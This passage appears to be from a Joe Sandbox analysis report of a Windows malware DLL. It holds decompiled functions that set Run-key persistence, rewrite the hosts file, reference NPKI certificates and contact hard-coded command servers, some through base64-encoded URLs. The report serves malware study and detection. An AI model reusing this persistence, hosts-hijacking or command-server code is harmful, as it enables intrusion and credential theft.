Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E10006499(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				CHAR* _t30;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t42;
				signed int _t46;
				void* _t51;
				void* _t54;
				void* _t55;
				intOrPtr _t60;
				void* _t61;
				void* _t62;

				_t70 = __eflags;
				_t52 = __edx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				 *((intOrPtr*)(_t61 - 0x10)) = _t62 - 0x13c;
				_t46 = 0x3f;
				_t54 = _t61 - 0x147;
				 *(_t61 - 0x148) = 0;
				memset(_t54, 0, _t46 << 2);
				_t55 = _t54 + _t46;
				asm("stosw");
				asm("stosb");
				_push(0x100);
				_push(0);
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 4)) = 0;
				E1000CCFC(0, 0, __esi, _t61, _t70, _t61 - 0x148);
				_t30 = E10001000(0, _t70, __fp0, "aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw=="); // executed
				_t33 = E1000CCAE(wsprintfA(_t61 - 0x148, _t30,  *((intOrPtr*)(_t61 + 8))), 0, 0, _t52, _t55, 0x7d000, _t61, _t70, __fp0, 0x7d000); // executed
				 *((intOrPtr*)(_t61 + 8)) = _t33;
				_push(0x7d000);
				_push(0);
				E1000CCFC(0, 0, 0x7d000, _t61, _t70, _t33);
				 *((intOrPtr*)(_t61 - 0x24)) = 0x1388;
				if(E10003F0A("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)", 0, 0, 0, 0) == 0) {
					L6:
					__eflags = 0;
					asm("invalid");
					asm("invalid");
					__ecx =  *((intOrPtr*)(__ebp - 0xc));
					_pop(__edi);
					_pop(__esi);
					 *[fs:0x0] =  *((intOrPtr*)(__ebp - 0xc));
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				} else {
					_t37 = E10003F24(_t35, _t61 - 0x148, 0, 0, 0x4000000, 0); // executed
					_t72 = _t37;
					 *((intOrPtr*)(_t61 - 0x38)) = _t37;
					if(_t37 == 0) {
						goto L6;
					} else {
						 *((char*)(_t61 - 0x34)) =  *((intOrPtr*)(_t61 + 0xb));
						0x10031a47(0);
						_t51 = _t61 - 0x34;
						0x100405c2(0, 0x10017b9c, E1000CD02(_t61 - 0x34, 0x10017b9c), 0x10017b9c, _t55);
						_t60 =  *0x1000e0fc;
						 *((char*)(_t61 - 4)) = 1;
						_push(4);
						_push(0);
						E1000CCFC(0, _t51, _t60, _t61, _t72,  *((intOrPtr*)(_t61 + 8)));
						_t42 = E10003F41( *((intOrPtr*)(_t61 - 0x38)),  *((intOrPtr*)(_t61 + 8)), 4, _t61 - 0x24);
						asm("les ebx, [ebx+edi]");
						return _t42;
					}
				}
			}

0x10006499
0x10006499
0x1000649e
0x100064a9
0x100064aa
0x100064ab
0x100064ae
0x100064b3
0x100064b6
0x100064bc
0x100064c2
0x100064c2
0x100064c4
0x100064c6
0x100064c7
0x100064d2
0x100064d4
0x100064d7
0x100064da
0x100064e4
0x10006503
0x1000650b
0x1000650e
0x1000650f
0x10006511
0x1000651f
0x10006530
0x1000677e
0x1000677e
0x10006782
0x10006784
0x100066d0
0x100066d3
0x100066d4
0x100066d5
0x100066dc
0x100066dd
0x100066dd
0x100066de
0x10006536
0x10006546
0x1000654e
0x10006550
0x10006553
0x00000000
0x10006559
0x10006560
0x10006563
0x10006577
0x1000657b
0x10006580
0x10006586
0x1000658f
0x10006591
0x10006595
0x100065a6
0x100065ac
0x100065af
0x100065af
0x10006553

APIs

wsprintfA.USER32 ref: 100064F7

Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C

___crtGetTimeFormatEx.LIBCMT ref: 10006546

Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,?,00000000,100062C4), ref: 10003F39

Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51

MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 100065C8
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00000000,?,?,?,?,000000FF), ref: 100065E6
wsprintfA.USER32 ref: 100066E9

Strings

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 1000651A
aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==, xrefs: 100064DF
title, xrefs: 10006647, 1000664C, 10006655

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
API String ID: 4077377486-2496724313
Opcode ID: c7eb83e4b2cbe741532e4934f3a97faadb23b47bf3999cf201c01ff8ac9ac8d2
Instruction ID: 6ddd42a7c2557d202ec314d980cd11a7fac2ec9c5269aac7b6a1c26b14e4e3ef
Opcode Fuzzy Hash: c7eb83e4b2cbe741532e4934f3a97faadb23b47bf3999cf201c01ff8ac9ac8d2
Instruction Fuzzy Hash: D0A1D5B680124DBFFB11DBA4DC82EEF7B7DDF08394F204065F904A6186DA756E448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006D08 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 72
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E10006D08(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void _v271;
				char _v272;
				void _v531;
				char _v532;
				void* __esi;
				void* _t21;
				signed int _t34;
				CHAR* _t44;
				void* _t50;

				_t50 = __eflags;
				_t34 = 0x40;
				_v532 = 0;
				memset( &_v531, 0, _t34 << 2);
				asm("stosw");
				asm("stosb");
				_t44 = "C:\\Users\\alfons\\Desktop\\abc.dll";
				E10003FF7(_t44,  &_v532, 0x104);
				_t21 = E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="); // executed
				E1000406C(0x80000001, _t21, 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12); // executed
				_push(0x40);
				_v272 = 0;
				memset( &_v271, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v272, "%s \"%s\",Dispatch", "C:\\Windows\\SysWOW64\\rundll32.exe", _t44);
				_push( &_v272);
				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, _t44) + 1); // executed
				return E10004092(_v8);
			}

0x10006d08
0x10006d18
0x10006d21
0x10006d2c
0x10006d2e
0x10006d30
0x10006d37
0x10006d3e
0x10006d60
0x10006d6c
0x10006d71
0x10006d7c
0x10006d83
0x10006d85
0x10006d87
0x10006d99
0x10006da5
0x10006dbf
0x10006dd4

APIs

Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003

Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A

wsprintfA.USER32 ref: 10006D99
___crtGetTimeFormatEx.LIBCMT ref: 10006DBF

Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9

Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096

Strings

Disp, xrefs: 10006DB7
REG_SZ, xrefs: 10006D55
C:\Windows\SysWOW64\rundll32.exe, xrefs: 10006D88
C:\Users\user\Desktop\abc.dll, xrefs: 10006D37, 10006D3D, 10006D82
U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D5B
%s "%s",Dispatch, xrefs: 10006D93

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
String ID: %s "%s",Dispatch$C:\Users\user\Desktop\abc.dll$C:\Windows\SysWOW64\rundll32.exe$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
API String ID: 1762869224-450200599
Opcode ID: aa7cbceaa3ed7cb5634bd50f743bbd192579eebf85e8bd443ae8d9d99b182fa9
Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
Opcode Fuzzy Hash: aa7cbceaa3ed7cb5634bd50f743bbd192579eebf85e8bd443ae8d9d99b182fa9
Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4

Uniqueness

Uniqueness Score: -1.00%

Function 026E0CDD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,026E1600,?,?,?,?), ref: 026E0D5C
wsprintfA.USER32(?,?,?,?), ref: 026E0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 026E0E18
ExitProcess.KERNEL32(00000000), ref: 026E0E20

Strings

The procedure %s could not be located in the DLL %s., xrefs: 026E0DF8
SWVU, xrefs: 026E0D64, 026E0D78, 026E0D7E, 026E0D84, 026E0DA1

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: AllocExitMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 1926473177-4208015514
Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction ID: e74489fce6e4d2b300eaed3c8e829687511ad7ae635bcff7a7829ab472e01b1f
Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction Fuzzy Hash: 3E417D322427469FEB38DF14CC84FEB73A5AF44351F04411CED4AA7685EBB1B8118B94

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v3;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				void _v128;
				void _v383;
				signed char _v384;
				char _v644;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t44;
				signed short _t49;
				void* _t54;
				signed int _t59;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				void* _t74;
				void* _t77;
				intOrPtr _t78;
				char* _t81;
				void* _t88;

				_t88 = __eflags;
				_t70 = __edx;
				_t59 = 0xc;
				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
				_t31 = memcpy( &_v128, _t77, _t59 << 2);
				_t74 = _t77 + _t59 + _t59;
				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
				asm("sbb [ebp-0x72b68a40], al");
				_t81 =  &_v3;
				asm("clc");
				_v16 = 4;
				_v12 = 0xc8;
				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31); // executed
				E10004092(_v8);
				_t78 = _a4;
				_push( &_v644);
				E1000CD0E(0, _t78);
				E100058A4(0, _t78);
				_t13 = _t78 + 0x60; // 0x128
				E10005ACA(_t88, _t13);
				_pop(_t62);
				_v80 = 0x40;
				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88); // executed
				_t71 = _v68;
				_t63 = 0x14;
				_t44 = E1000CDB0(_v72, _t63, _t71);
				asm("adc edx, 0x0");
				_t18 = _t78 + 0x40; // 0x108
				E10003EF4(_t18, "%u MB", _t44 + 1);
				_t19 = _t78 + 0x80; // 0x148
				_t49 = E1000CD0E(_t63, _t19);
				0x1003e508("12071239", _t71, _t81,  &_v80);
				_v384 = _v384 & 0x00000000;
				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
				_t64 = 0x3f;
				memset( &_v383, 0, _t64 << 2);
				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
				asm("stosw");
				asm("stosb");
				_t54 = E10005CF7( &_v384, 0x100); // executed
				_t67 = _t81;
				if(_t54 == 0) {
					__eflags = _t78 + 0xa0;
					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
				}
				_push( &_v384);
				return E1000CD0E(_t67, _t78 + 0xa0);
			}

0x10005db4
0x10005db4
0x10005dc4
0x10005dc5
0x10005dd9
0x10005dd9
0x10005de0
0x10005de5
0x10005deb
0x10005dec
0x10005ded
0x10005e07
0x10005e11
0x10005e19
0x10005e1e
0x10005e27
0x10005e29
0x10005e44
0x10005e49
0x10005e4d
0x10005e56
0x10005e57
0x10005e60
0x10005e68
0x10005e6d
0x10005e6e
0x10005e76
0x10005e7b
0x10005e84
0x10005e89
0x10005e95
0x10005e9e
0x10005ea3
0x10005eaf
0x10005eb5
0x10005ebe
0x10005ec0
0x10005ecc
0x10005ece
0x10005ed6
0x10005ede
0x10005edf
0x10005efd
0x00000000
0x10005f0e
0x10005eed
0x00000000

APIs

___crtGetTimeFormatEx.LIBCMT ref: 10005E11

Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 100040B2

Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096

Strings

http://107.163.56.232:18963/main.php, xrefs: 10005EF8
%u MB, xrefs: 10005E7E
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10005DC5
@, xrefs: 10005E57
ProcessorNameString, xrefs: 10005E02
12071239, xrefs: 10005E8F

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseFormatQueryTimeValue___crt
String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
API String ID: 271660946-279254293
Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55

Uniqueness

Uniqueness Score: -1.00%

Function 1000827D Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 145
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E1000827D() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				char _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void* _t44;
				void* _t50;
				void* _t56;
				signed int _t61;
				signed int _t67;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t78;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t98;
				void* _t99;
				void* _t102;
				void* _t104;
				void* _t109;

				_v268 = _v268 & 0x00000000;
				_t72 = 0x40;
				memset( &_v267, 0, _t72 << 2);
				_v528 = _v528 & 0x00000000;
				asm("stosw");
				asm("stosb");
				memset( &_v527, E1002ED85(_t96, _t98), 0 << 2);
				asm("stosw");
				asm("stosb");
				 *_t96( &_v268, 0x104, _t98, 0x40);
				 *_t96( &_v528, 0x104);
				_t44 = E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3Rz"); // executed
				_push(_t44);
				E1000CD08(0,  &_v268);
				_push(E10001000(0, 0, _t109, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
				_t50 = E1000CCAE(E1000CD08(0,  &_v528), _t70, 0, _t86, 0x104, 0x80000, _t98, 0, _t109, 0x80000); // executed
				_t102 = _t99 + 0x34;
				_t71 = _t50;
				while(1) {
					_v1808 = _v1808 & 0x00000000;
					memset( &_v1807, 0, 0xff << 2);
					_v784 = _v784 & 0x00000000;
					asm("stosw");
					asm("stosb");
					_t78 = 0x3f;
					_t94 =  &_v783;
					memset(_t94, 0, 0 << 2);
					_t104 = _t102 + 0x18;
					_t95 = _t94 + _t78;
					asm("stosw");
					asm("stosb");
					_t56 = E10005C4C( &_v784, 0x100); // executed
					_t107 = _t56;
					_pop(_t81);
					if(_t56 == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v784);
					}
					_push("%s");
					_push( &_v1808);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(_t71, _t81, 0x80000, _t98, _t107, _t71);
					_t61 = E100061BD(_t81, 0x80000, _t107, _t109,  &_v1808, _t71, 0x80000); // executed
					_t102 = _t104 + 0x24;
					_v8 = _t61;
					if(_t61 > 7) {
						goto L6;
					}
					L5:
					Sleep( *0x10012500); // executed
					continue;
					L6:
					_t82 = 0;
					__eflags = _t61;
					if(_t61 <= 0) {
						L11:
						__eflags = E1000CD02(_t82, 0x80000) - 0x10;
						_t83 = _t71;
						if(__eflags <= 0) {
							_t95 = 0x10016ae0;
							_push(_t71);
							__eflags = E1000CDF2(0x80000);
							_t83 = 0x10016ae0;
							if(__eflags != 0) {
								wsprintfA(0x10016ae0, "%s", _t71);
								_t102 = _t102 + 0xc;
							}
						}
						E1000721F(_t71, _t83, _t86, _t95, 0x80000, __eflags, _t109);
						_t102 = _t102 + 0xc;
						0x1004303b(0x80000, E10001000(_t83, __eflags, _t109, "Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM="), 0, 0, "127.0.0.1", "8.8.8.8");
						goto L5;
					} else {
						goto L7;
					}
					do {
						L7:
						_t67 = _t82;
						asm("cdq");
						_t95 = 2;
						_t86 = _t67 % _t95;
						__eflags = _t67 % _t95;
						if(_t67 % _t95 == 0) {
							_t32 = _t82 + _t71;
							 *_t32 =  *(_t82 + _t71) + 0x4b;
							__eflags =  *_t32;
						} else {
							 *(_t82 + _t71) =  *(_t82 + _t71) + 0x3a;
						}
						_t82 = _t82 + 1;
						__eflags = _t82 - _v8;
					} while (_t82 < _v8);
					goto L11;
				}
			}

0x10008286
0x10008294
0x1000829b
0x1000829d
0x100082a6
0x100082a8
0x100082b8
0x100082ba
0x100082bc
0x100082ca
0x100082d4
0x100082db
0x100082e0
0x100082e8
0x100082f7
0x1000830a
0x1000830f
0x10008312
0x10008314
0x10008314
0x10008328
0x1000832a
0x10008333
0x10008335
0x10008336
0x10008339
0x10008344
0x10008344
0x10008344
0x10008346
0x10008348
0x10008350
0x10008356
0x10008358
0x10008359
0x10008364
0x1000835b
0x10008361
0x10008361
0x1000836f
0x10008374
0x10008375
0x1000837d
0x1000837e
0x10008381
0x1000838f
0x10008394
0x1000839a
0x1000839d
0x00000000
0x00000000
0x1000839f
0x100083a5
0x00000000
0x100083b0
0x100083b0
0x100083b2
0x100083b4
0x100083d2
0x100083d8
0x100083db
0x100083dc
0x100083de
0x100083e3
0x100083eb
0x100083ed
0x100083ee
0x100083f7
0x100083fd
0x100083fd
0x100083ee
0x1000840c
0x10008411
0x10008423
0x00000000
0x00000000
0x00000000
0x00000000
0x100083b6
0x100083b6
0x100083b6
0x100083ba
0x100083bb
0x100083bc
0x100083be
0x100083c0
0x100083c8
0x100083c8
0x100083c8
0x100083c2
0x100083c2
0x100083c2
0x100083cc
0x100083cd
0x100083cd
0x00000000
0x100083b6

APIs

Sleep.KERNEL32(00080000,00000000,00000000), ref: 100083A5
wsprintfA.USER32 ref: 100083F7

Strings

XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082ED
127.0.0.1, xrefs: 10008405
http://107.163.56.232:18963/main.php, xrefs: 10008364
Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008416
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082D6
8.8.8.8, xrefs: 10008400

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleepwsprintf
String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
API String ID: 1749205058-515792873
Opcode ID: 0a65ecdc5c10997eff8f8d016a8dbeb38ea98cc6370c935f154c7ff009c99062
Instruction ID: 307e7fa5ef9b1f310a37dbdaab843115ee1a86e3901deb50f67a69e2b05b1656
Opcode Fuzzy Hash: 0a65ecdc5c10997eff8f8d016a8dbeb38ea98cc6370c935f154c7ff009c99062
Instruction Fuzzy Hash: 394106B6D042597AF721D364CC46FCB7B6CEB443C0F2040A5F248B9086DAB4BB858F55

Uniqueness

Uniqueness Score: -1.00%

Function 10008020 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 154
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000BB8), ref: 100081D8

Strings

P, xrefs: 10008108
NPKI, xrefs: 1000803D
L2ltYWdlLnBocA==, xrefs: 1000819C
12071239, xrefs: 1000806C
107.163.56.232:18963/main.php, xrefs: 10008124
%s\%s, xrefs: 10008078

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: %s\%s$107.163.56.232:18963/main.php$12071239$L2ltYWdlLnBocA==$NPKI$P
API String ID: 3472027048-923127458
Opcode ID: 7ff9c99e21f47383f41bb9b6fce63d29a7719f8193ab9cd7f6c9b1b7bc0450e4
Instruction ID: 78fb94449fb561d3ad5dbef52e8c6d42d31868d332eaa78ded5861372861b631
Opcode Fuzzy Hash: 7ff9c99e21f47383f41bb9b6fce63d29a7719f8193ab9cd7f6c9b1b7bc0450e4
Instruction Fuzzy Hash: 41417276804259AEEB11D7B4DC45BEE7BBCFB49350F1004E6E248E6182EA709B848F11

Uniqueness

Uniqueness Score: -1.00%

Function 026E0C61 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32(?,?,?,?), ref: 026E0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 026E0E18
ExitProcess.KERNEL32(00000000), ref: 026E0E20
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 026E0E69

Strings

The procedure %s could not be located in the DLL %s., xrefs: 026E0DF8
SWVU, xrefs: 026E0D78, 026E0D7E, 026E0D84, 026E0DA1

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: ExitFreeMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 789587083-4208015514
Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction ID: 9507d669ea0d84cb36ebe75c52d6cd4220fc78d5a74f692721021fac4f0baeca
Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction Fuzzy Hash: 4531A9322062869FEF399F10CC84FEB77A9AF46314F040169ED47A6285EB70A8158B90

Uniqueness

Uniqueness Score: -1.00%

Function 10008578 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 83
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v32;
				CHAR* _v72;
				void _v76;
				char _v80;
				char _v96;
				void _v355;
				char _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t35;
				void* _t36;
				void* _t38;
				signed int _t39;
				signed int _t41;
				void* _t43;
				void* _t51;
				void* _t57;

				_t57 = __eflags;
				_t43 = __edx;
				_t38 = __ecx;
				Sleep(0x2710); // executed
				_t19 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw="); // executed
				_v12 = _t19;
				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000); // executed
				_push(0x300000);
				_push(0);
				_v8 = _t20;
				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000); // executed
				_t50 = _t22;
				if(_t22 <= 0) {
					L1:
					Sleep(0x1b7740); // executed
					goto L1;
				}
				_t39 = 0x40;
				_v356 = 0;
				_t24 = memset( &_v355, 0, _t39 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
				__eflags = 0;
				_t41 = 0x10;
				memset( &_v76, 0, _t41 << 2);
